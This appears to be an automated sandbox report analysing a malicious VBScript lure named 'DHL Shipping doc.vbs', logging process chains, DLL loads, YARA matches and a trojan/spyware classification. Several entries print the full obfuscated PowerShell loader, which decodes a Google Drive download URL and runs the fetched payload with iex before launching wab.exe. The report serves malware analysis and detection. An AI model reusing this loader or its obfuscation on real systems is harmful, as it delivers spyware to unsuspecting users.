            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function Selvstarterens($Journal){$Nomadeinvasionens165=$Journal.Length-$Tarboosh;For($Effectible=5; $Effectible -lt $Nomadeinvasionens165; $Effectible+=(6)){$Lagringsformers+=$Journal.$Ldreforvaltningen.Invoke($Effectible, $Tarboosh);}$Lagringsformers;}function Spelean($Surmaster){. ($Reproduktionsteknikkens) ($Surmaster);}$Uvelkomne=Selvstarterens 'PlummMSkul oPolerz,oliliOvulalbestylvi.uiagen.e/Bat.e5Vandp. ouse0Bas,e Nove(AntipW nyrei A.jenPrv.tdA.auaoAflgnw refosPulve Sty,kNPlyssTDds y Super1 Renl0Overb.Weste0b ned; catu LivreWAcqueiSpeaknMyo,o6ran e4 Sn g;Luthe Kintx rose6Photo4Bef t; odke AlgerrPimpsv Feis: nge1Eryth2South1 Over.Flag 0F,rce)debug AmeriG ,arseRotuncFloppkKokleofysio/kopif2Konom0Tipti1Lag.r0Kalku0Opret1S ksk0 A.cu1Unspr turbFstfroiImpe.rWhor.eMa sifUnid,oLand.xNonf /Doket1Sikke2vrang1 Deci.Mesom0 L,ee ';$Yellowfish=Selvstarterens 'G undUDimmosAflire,onharIncel- FradAD.utog R.coe.orksn,erdetHalen ';$Ellokomotiv242=Selvstarterens 'Falkeh elvetAdmirtSyge.pnyanls Th.n:Tugt / Lepi/A.pasdSbr dr Anchis kkevSupereFo.tm.BreasgRarefo Fonlo Bageg CapslBeforeAlkoh.Granic,ejrsoRecemmplate/ VaskuTeknocR.llo?ItczeeRescuxElevap VulsoUd,karDermatIn si=EpilodCrampoLuksuw BortnT rmilApheloNe gaa dtoed cams&Nonadi GlumdNoi.e=Amill1Skrivx QuinC .nsvK Kv.kkBro.hDSlovaLG nerKPupilk thuriBoatlJmortagHydroTkr,ptCsla p2FipskNV ndu2Aands8HellehdruesjCatholSlagt0U tral ask1det,c9IntruULiderbAquavuStenbxSl.ndJShove6 Avisw Subc9Overt ';$intersessional=Selvstarterens ' Stal>Tidsd ';$Reproduktionsteknikkens=Selvstarterens 'BygniiCha me T.okx ,ned ';$Guiding='Scop124';Spelean (Selvstarterens 'VirksSRiddeeJointtStave-Smr.aCFarmeoCastrnRegistFirmaeMilten G.vetProev F,dst- verP JubbaPeriotKrlhahTvrsk ForeaT,econ:Forma\nedb,B BromiColles pre i.hotodSand,dHydraeSt,mmr Ho,neha,mon.sthe.Unurnt ilatxCo tatAlcon Sylve-Fu,daV B.gsaindbelapparuAars eSabi Ammo,$P,atrG NonruSo ediExtradSrgeri RabunB issgSigna;Spe l ');Spelean (Selvstarterens ' .nneiJave,fDeleg Nonn(Frit.t TekseSocrasLuft.tDani,-Bead.pBalm,aQuiritfi.enhOlymp NonnaTAton,:Dechi\ AadsB rakiiPredesHektai PjatdSkrendprecieUund.rVolleeBre snEquip.Egenpt ashlxEnsilt,here) ultr{ TromeGunnaxPe muiGementS,gne}Ethno;Homes ');$Dilamination = Selvstarterens 'Yunp e ButtckonkahTkkesoNeden Komar% amma .alvpErratpIndhadKolleaMesmetAarboaParap%Konsu\CantoAObfuspBauxit rsenyTod,icConnuhJde vu,heolsfuran.Tabe.WPolsthEmbleiMorbi Trvej& K.nt& Pro, AlgareGashacImpu,hBreako Gte. Coryb$Ciliu ';Spelean (Selvstarterens 'Reabs$ Codeg JdinlRegrao Twi,bfdselaUnco.l Utru:Ob,lsfUnparoEnkelrAfslreOpfunc Sulfo PariuFilm,nR.licsUranoesandol,nder=ingvo(Staa.c QuadmGeo.hdAft n Pi.ds/AnkomcRader Brunl$ ModiD orsi JarglN.outaBa ekmKendei BensnGastra DdsdtSlingi Ast.oDushsnRedhe).ikke ');Spelean (Selvstarterens ' Konk$OncotgTiltalforudoModsvbHavegaJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B8ACED61_2_00007FFD9B8ACED6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B8ADC821_2_00007FFD9B8ADC82
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_084F10104_2_084F1010
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_084F18E04_2_084F18E0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_084F0CC84_2_084F0CC8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22244A989_2_22244A98
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_2224A9709_2_2224A970
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22243E809_2_22243E80
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_222441C89_2_222441C8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_2224F86F9_2_2224F86F
            Source: DHL Shipping doc.vbsInitial sample: Strings found which are bigger than 50
            Source: amsi64_6692.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: amsi32_5932.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 6692, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 5932, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@12/7@5/4
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Aptychus.WhiJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6720:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ireixikg.yh2.ps1Jump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Shipping doc.vbs"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6692
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5932
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: DHL Shipping doc.vbsVirustotal: Detection: 14%
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Shipping doc.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function Selvstarterens($Journal){$Nomadeinvasionens165=$Journal.Length-$Tarboosh;For($Effectible=5; $Effectible -lt $Nomadeinvasionens165; $Effectible+=(6)){$Lagringsformers+=$Journal.$Ldreforvaltningen.Invoke($Effectible, $Tarboosh);}$Lagringsformers;}function Spelean($Surmaster){. ($Reproduktionsteknikkens) ($Surmaster);}$Uvelkomne=Selvstarterens 'PlummMSkul oPolerz,oliliOvulalbestylvi.uiagen.e/Bat.e5Vandp. ouse0Bas,e Nove(AntipW nyrei A.jenPrv.tdA.auaoAflgnw refosPulve Sty,kNPlyssTDds y Super1 Renl0Overb.Weste0b ned; catu LivreWAcqueiSpeaknMyo,o6ran e4 Sn g;Luthe Kintx rose6Photo4Bef t; odke AlgerrPimpsv Feis: nge1Eryth2South1 Over.Flag 0F,rce)debug AmeriG ,arseRotuncFloppkKokleofysio/kopif2Konom0Tipti1Lag.r0Kalku0Opret1S ksk0 A.cu1Unspr turbFstfroiImpe.rWhor.eMa sifUnid,oLand.xNonf /Doket1Sikke2vrang1 Deci.Mesom0 L,ee ';$Yellowfish=Selvstarterens 'G undUDimmosAflire,onharIncel- FradAD.utog R.coe.orksn,erdetHalen ';$Ellokomotiv242=Selvstarterens 'Falkeh elvetAdmirtSyge.pnyanls Th.n:Tugt / Lepi/A.pasdSbr dr Anchis kkevSupereFo.tm.BreasgRarefo Fonlo Bageg CapslBeforeAlkoh.Granic,ejrsoRecemmplate/ VaskuTeknocR.llo?ItczeeRescuxElevap VulsoUd,karDermatIn si=EpilodCrampoLuksuw BortnT rmilApheloNe gaa dtoed cams&Nonadi GlumdNoi.e=Amill1Skrivx QuinC .nsvK Kv.kkBro.hDSlovaLG nerKPupilk thuriBoatlJmortagHydroTkr,ptCsla p2FipskNV ndu2Aands8HellehdruesjCatholSlagt0U tral ask1det,c9IntruULiderbAquavuStenbxSl.ndJShove6 Avisw Subc9Overt ';$intersessional=Selvstarterens ' Stal>Tidsd ';$Reproduktionsteknikkens=Selvstarterens 'BygniiCha me T.okx ,ned ';$Guiding='Scop124';Spelean (Selvstarterens 'VirksSRiddeeJointtStave-Smr.aCFarmeoCastrnRegistFirmaeMilten G.vetProev F,dst- verP JubbaPeriotKrlhahTvrsk ForeaT,econ:Forma\nedb,B BromiColles pre i.hotodSand,dHydraeSt,mmr Ho,neha,mon.sthe.Unurnt ilatxCo tatAlcon Sylve-Fu,daV B.gsaindbelapparuAars eSabi Ammo,$P,atrG NonruSo ediExtradSrgeri RabunB issgSigna;Spe l ');Spelean (Selvstarterens ' .nneiJave,fDeleg Nonn(Frit.t TekseSocrasLuft.tDani,-Bead.pBalm,aQuiritfi.enhOlymp NonnaTAton,:Dechi\ AadsB rakiiPredesHektai PjatdSkrendprecieUund.rVolleeBre snEquip.Egenpt ashlxEnsilt,here) ultr{ TromeGunnaxPe muiGementS,gne}Ethno;Homes ');$Dilamination = Selvstarterens 'Yunp e ButtckonkahTkkesoNeden Komar% amma .alvpErratpIndhadKolleaMesmetAarboaParap%Konsu\CantoAObfuspBauxit rsenyTod,icConnuhJde vu,heolsfuran.Tabe.WPolsthEmbleiMorbi Trvej& K.nt& Pro, AlgareGashacImpu,hBreako Gte. Coryb$Ciliu ';Spelean (Selvstarterens 'Reabs$ Codeg JdinlRegrao Twi,bfdselaUnco.l Utru:Ob,lsfUnparoEnkelrAfslreOpfunc Sulfo PariuFilm,nR.licsUranoesandol,nder=ingvo(Staa.c QuadmGeo.hdAft n Pi.ds/AnkomcRader Brunl$ ModiD orsi JarglN.outaBa ekmKendei BensnGastra DdsdtSlingi Ast.oDushsnRedhe).ikke ');Spelean (Selvstarterens ' Konk$OncotgTiltalforudoModsvbHavega
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Aptychus.Whi && echo $"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function Selvstarterens($Journal){$Nomadeinvasionens165=$Journal.Length-$Tarboosh;For($Effectible=5; $Effectible -lt $Nomadeinvasionens165; $Effectible+=(6)){$Lagringsformers+=$Journal.$Ldreforvaltningen.Invoke($Effectible, $Tarboosh);}$Lagringsformers;}function Spelean($Surmaster){. ($Reproduktionsteknikkens) ($Surmaster);}$Uvelkomne=Selvstarterens 'PlummMSkul oPolerz,oliliOvulalbestylvi.uiagen.e/Bat.e5Vandp. ouse0Bas,e Nove(AntipW nyrei A.jenPrv.tdA.auaoAflgnw refosPulve Sty,kNPlyssTDds y Super1 Renl0Overb.Weste0b ned; catu LivreWAcqueiSpeaknMyo,o6ran e4 Sn g;Luthe Kintx rose6Photo4Bef t; odke AlgerrPimpsv Feis: nge1Eryth2South1 Over.Flag 0F,rce)debug AmeriG ,arseRotuncFloppkKokleofysio/kopif2Konom0Tipti1Lag.r0Kalku0Opret1S ksk0 A.cu1Unspr turbFstfroiImpe.rWhor.eMa sifUnid,oLand.xNonf /Doket1Sikke2vrang1 Deci.Mesom0 L,ee ';$Yellowfish=Selvstarterens 'G undUDimmosAflire,onharIncel- FradAD.utog R.coe.orksn,erdetHalen ';$Ellokomotiv242=Selvstarterens 'Falkeh elvetAdmirtSyge.pnyanls Th.n:Tugt / Lepi/A.pasdSbr dr Anchis kkevSupereFo.tm.BreasgRarefo Fonlo Bageg CapslBeforeAlkoh.Granic,ejrsoRecemmplate/ VaskuTeknocR.llo?ItczeeRescuxElevap VulsoUd,karDermatIn si=EpilodCrampoLuksuw BortnT rmilApheloNe gaa dtoed cams&Nonadi GlumdNoi.e=Amill1Skrivx QuinC .nsvK Kv.kkBro.hDSlovaLG nerKPupilk thuriBoatlJmortagHydroTkr,ptCsla p2FipskNV ndu2Aands8HellehdruesjCatholSlagt0U tral ask1det,c9IntruULiderbAquavuStenbxSl.ndJShove6 Avisw Subc9Overt ';$intersessional=Selvstarterens ' Stal>Tidsd ';$Reproduktionsteknikkens=Selvstarterens 'BygniiCha me T.okx ,ned ';$Guiding='Scop124';Spelean (Selvstarterens 'VirksSRiddeeJointtStave-Smr.aCFarmeoCastrnRegistFirmaeMilten G.vetProev F,dst- verP JubbaPeriotKrlhahTvrsk ForeaT,econ:Forma\nedb,B BromiColles pre i.hotodSand,dHydraeSt,mmr Ho,neha,mon.sthe.Unurnt ilatxCo tatAlcon Sylve-Fu,daV B.gsaindbelapparuAars eSabi Ammo,$P,atrG NonruSo ediExtradSrgeri RabunB issgSigna;Spe l ');Spelean (Selvstarterens ' .nneiJave,fDeleg Nonn(Frit.t TekseSocrasLuft.tDani,-Bead.pBalm,aQuiritfi.enhOlymp NonnaTAton,:Dechi\ AadsB rakiiPredesHektai PjatdSkrendprecieUund.rVolleeBre snEquip.Egenpt ashlxEnsilt,here) ultr{ TromeGunnaxPe muiGementS,gne}Ethno;Homes ');$Dilamination = Selvstarterens 'Yunp e ButtckonkahTkkesoNeden Komar% amma .alvpErratpIndhadKolleaMesmetAarboaParap%Konsu\CantoAObfuspBauxit rsenyTod,icConnuhJde vu,heolsfuran.Tabe.WPolsthEmbleiMorbi Trvej& K.nt& Pro, AlgareGashacImpu,hBreako Gte. Coryb$Ciliu ';Spelean (Selvstarterens 'Reabs$ Codeg JdinlRegrao Twi,bfdselaUnco.l Utru:Ob,lsfUnparoEnkelrAfslreOpfunc Sulfo PariuFilm,nR.licsUranoesandol,nder=ingvo(Staa.c QuadmGeo.hdAft n Pi.ds/AnkomcRader Brunl$ ModiD orsi JarglN.outaBa ekmKendei BensnGastra DdsdtSlingi Ast.oDushsnRedhe).ikke ');Spelean (Selvstarterens ' Konk$OncotgTiltalforudoModsvbHavega
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Aptychus.Whi && echo $"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function Selvstarterens($Journal){$Nomadeinvasionens165=$Journal.Length-$Tarboosh;For($Effectible=5; $Effectible -lt $Nomadeinvasionens165; $Effectible+=(6)){$Lagringsformers+=$Journal.$Ldreforvaltningen.Invoke($Effectible, $Tarboosh);}$Lagringsformers;}function Spelean($Surmaster){. ($Reproduktionsteknikkens) ($Surmaster);}$Uvelkomne=Selvstarterens 'PlummMSkul oPolerz,oliliOvulalbestylvi.uiagen.e/Bat.e5Vandp. ouse0Bas,e Nove(AntipW nyrei A.jenPrv.tdA.auaoAflgnw refosPulve Sty,kNPlyssTDds y Super1 Renl0Overb.Weste0b ned; catu LivreWAcqueiSpeaknMyo,o6ran e4 Sn g;Luthe Kintx rose6Photo4Bef t; odke AlgerrPimpsv Feis: nge1Eryth2South1 Over.Flag 0F,rce)debug AmeriG ,arseRotuncFloppkKokleofysio/kopif2Konom0Tipti1Lag.r0Kalku0Opret1S ksk0 A.cu1Unspr turbFstfroiImpe.rWhor.eMa sifUnid,oLand.xNonf /Doket1Sikke2vrang1 Deci.Mesom0 L,ee ';$Yellowfish=Selvstarterens 'G undUDimmosAflire,onharIncel- FradAD.utog R.coe.orksn,erdetHalen ';$Ellokomotiv242=Selvstarterens 'Falkeh elvetAdmirtSyge.pnyanls Th.n:Tugt / Lepi/A.pasdSbr dr Anchis kkevSupereFo.tm.BreasgRarefo Fonlo Bageg CapslBeforeAlkoh.Granic,ejrsoRecemmplate/ VaskuTeknocR.llo?ItczeeRescuxElevap VulsoUd,karDermatIn si=EpilodCrampoLuksuw BortnT rmilApheloNe gaa dtoed cams&Nonadi GlumdNoi.e=Amill1Skrivx QuinC .nsvK Kv.kkBro.hDSlovaLG nerKPupilk thuriBoatlJmortagHydroTkr,ptCsla p2FipskNV ndu2Aands8HellehdruesjCatholSlagt0U tral ask1det,c9IntruULiderbAquavuStenbxSl.ndJShove6 Avisw Subc9Overt ';$intersessional=Selvstarterens ' Stal>Tidsd ';$Reproduktionsteknikkens=Selvstarterens 'BygniiCha me T.okx ,ned ';$Guiding='Scop124';Spelean (Selvstarterens 'VirksSRiddeeJointtStave-Smr.aCFarmeoCastrnRegistFirmaeMilten G.vetProev F,dst- verP JubbaPeriotKrlhahTvrsk ForeaT,econ:Forma\nedb,B BromiColles pre i.hotodSand,dHydraeSt,mmr Ho,neha,mon.sthe.Unurnt ilatxCo tatAlcon Sylve-Fu,daV B.gsaindbelapparuAars eSabi Ammo,$P,atrG NonruSo ediExtradSrgeri RabunB issgSigna;Spe l ');Spelean (Selvstarterens ' .nneiJave,fDeleg Nonn(Frit.t TekseSocrasLuft.tDani,-Bead.pBalm,aQuiritfi.enhOlymp NonnaTAton,:Dechi\ AadsB rakiiPredesHektai PjatdSkrendprecieUund.rVolleeBre snEquip.Egenpt ashlxEnsilt,here) ultr{ TromeGunnaxPe muiGementS,gne}Ethno;Homes ');$Dilamination = Selvstarterens 'Yunp e ButtckonkahTkkesoNeden Komar% amma .alvpErratpIndhadKolleaMesmetAarboaParap%Konsu\CantoAObfuspBauxit rsenyTod,icConnuhJde vu,heolsfuran.Tabe.WPolsthEmbleiMorbi Trvej& K.nt& Pro, AlgareGashacImpu,hBreako Gte. Coryb$Ciliu ';Spelean (Selvstarterens 'Reabs$ Codeg JdinlRegrao Twi,bfdselaUnco.l Utru:Ob,lsfUnparoEnkelrAfslreOpfunc Sulfo PariuFilm,nR.licsUranoesandol,nder=ingvo(Staa.c QuadmGeo.hdAft n Pi.ds/AnkomcRader Brunl$ ModiD orsi JarglN.outaBa ekmKendei BensnGastra DdsdtSlingi Ast.oDushsnRedhe).ikke ');Spelean (Selvstarterens ' Konk$OncotgTiltalforudoModsvbHavegaJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Aptychus.Whi && echo $"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function Selvstarterens($Journal){$Nomadeinvasionens165=$Journal.Length-$Tarboosh;For($Effectible=5; $Effectible -lt $Nomadeinvasionens165; $Effectible+=(6)){$Lagringsformers+=$Journal.$Ldreforvaltningen.Invoke($Effectible, $Tarboosh);}$Lagringsformers;}function Spelean($Surmaster){. ($Reproduktionsteknikkens) ($Surmaster);}$Uvelkomne=Selvstarterens 'PlummMSkul oPolerz,oliliOvulalbestylvi.uiagen.e/Bat.e5Vandp. ouse0Bas,e Nove(AntipW nyrei A.jenPrv.tdA.auaoAflgnw refosPulve Sty,kNPlyssTDds y Super1 Renl0Overb.Weste0b ned; catu LivreWAcqueiSpeaknMyo,o6ran e4 Sn g;Luthe Kintx rose6Photo4Bef t; odke AlgerrPimpsv Feis: nge1Eryth2South1 Over.Flag 0F,rce)debug AmeriG ,arseRotuncFloppkKokleofysio/kopif2Konom0Tipti1Lag.r0Kalku0Opret1S ksk0 A.cu1Unspr turbFstfroiImpe.rWhor.eMa sifUnid,oLand.xNonf /Doket1Sikke2vrang1 Deci.Mesom0 L,ee ';$Yellowfish=Selvstarterens 'G undUDimmosAflire,onharIncel- FradAD.utog R.coe.orksn,erdetHalen ';$Ellokomotiv242=Selvstarterens 'Falkeh elvetAdmirtSyge.pnyanls Th.n:Tugt / Lepi/A.pasdSbr dr Anchis kkevSupereFo.tm.BreasgRarefo Fonlo Bageg CapslBeforeAlkoh.Granic,ejrsoRecemmplate/ VaskuTeknocR.llo?ItczeeRescuxElevap VulsoUd,karDermatIn si=EpilodCrampoLuksuw BortnT rmilApheloNe gaa dtoed cams&Nonadi GlumdNoi.e=Amill1Skrivx QuinC .nsvK Kv.kkBro.hDSlovaLG nerKPupilk thuriBoatlJmortagHydroTkr,ptCsla p2FipskNV ndu2Aands8HellehdruesjCatholSlagt0U tral ask1det,c9IntruULiderbAquavuStenbxSl.ndJShove6 Avisw Subc9Overt ';$intersessional=Selvstarterens ' Stal>Tidsd ';$Reproduktionsteknikkens=Selvstarterens 'BygniiCha me T.okx ,ned ';$Guiding='Scop124';Spelean (Selvstarterens 'VirksSRiddeeJointtStave-Smr.aCFarmeoCastrnRegistFirmaeMilten G.vetProev F,dst- verP JubbaPeriotKrlhahTvrsk ForeaT,econ:Forma\nedb,B BromiColles pre i.hotodSand,dHydraeSt,mmr Ho,neha,mon.sthe.Unurnt ilatxCo tatAlcon Sylve-Fu,daV B.gsaindbelapparuAars eSabi Ammo,$P,atrG NonruSo ediExtradSrgeri RabunB issgSigna;Spe l ');Spelean (Selvstarterens ' .nneiJave,fDeleg Nonn(Frit.t TekseSocrasLuft.tDani,-Bead.pBalm,aQuiritfi.enhOlymp NonnaTAton,:Dechi\ AadsB rakiiPredesHektai PjatdSkrendprecieUund.rVolleeBre snEquip.Egenpt ashlxEnsilt,here) ultr{ TromeGunnaxPe muiGementS,gne}Ethno;Homes ');$Dilamination = Selvstarterens 'Yunp e ButtckonkahTkkesoNeden Komar% amma .alvpErratpIndhadKolleaMesmetAarboaParap%Konsu\CantoAObfuspBauxit rsenyTod,icConnuhJde vu,heolsfuran.Tabe.WPolsthEmbleiMorbi Trvej& K.nt& Pro, AlgareGashacImpu,hBreako Gte. Coryb$Ciliu ';Spelean (Selvstarterens 'Reabs$ Codeg JdinlRegrao Twi,bfdselaUnco.l Utru:Ob,lsfUnparoEnkelrAfslreOpfunc Sulfo PariuFilm,nR.licsUranoesandol,nder=ingvo(Staa.c QuadmGeo.hdAft n Pi.ds/AnkomcRader Brunl$ ModiD orsi JarglN.outaBa ekmKendei BensnGastra DdsdtSlingi Ast.oDushsnRedhe).ikke ');Spelean (Selvstarterens ' Konk$OncotgTiltalforudoModsvbHavegaJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Aptychus.Whi && echo $"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
